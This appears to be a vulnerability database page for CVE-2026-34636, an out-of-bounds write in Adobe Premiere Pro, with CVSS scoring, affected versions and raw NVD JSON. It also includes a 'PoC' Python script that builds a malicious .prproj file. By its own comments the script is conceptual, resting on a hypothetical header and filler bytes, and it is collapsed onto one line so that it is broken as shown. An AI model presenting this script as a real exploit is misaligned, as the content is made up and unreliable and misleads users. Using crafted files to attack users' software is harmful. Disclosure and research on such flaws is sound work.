Security Vulnerability Report
中文
CVE-2026-34636 CVSS 7.8 HIGH

CVE-2026-34636

Published: 2026-05-12 18:17:10
Last Modified: 2026-05-13 14:31:43

Description

Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:premiere_pro:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:premiere_pro:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Premiere Pro <= 26.0.2
Adobe Premiere Pro <= 25.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34636 (Conceptual) # This script generates a malformed file intended to trigger the OOB write in Adobe Premiere Pro. import struct def create_malicious_file(filename): # Header for a generic project file (hypothetical structure) header = b"PRPROJ\x00" # Padding to reach the vulnerable offset in memory padding = b"A" * 0x100 # Malicious payload designed to trigger out-of-bounds write # In a real exploit, this would contain addresses to redirect execution flow payload = b"\x41" * 0x500 # Excessive data causing OOB with open(filename, "wb") as f: f.write(header + padding + payload) if __name__ == "__main__": print("Generating malicious file for CVE-2026-34636...") create_malicious_file("exploit_CVE-2026-34636.prproj") print("File created successfully. Open this in the vulnerable version of Premiere Pro to trigger the crash.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34636", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:09.917", "lastModified": "2026-05-13T14:31:42.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:premiere_pro:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.6.5", "matchCriteriaId": "5785D702-760C-4732-A035-0FE9979B51E9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:premiere_pro:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "2DB8A153-6ACB-4DDC-9B9B-24EE19CCCAE3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/premiere_pro/apsb26-46.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}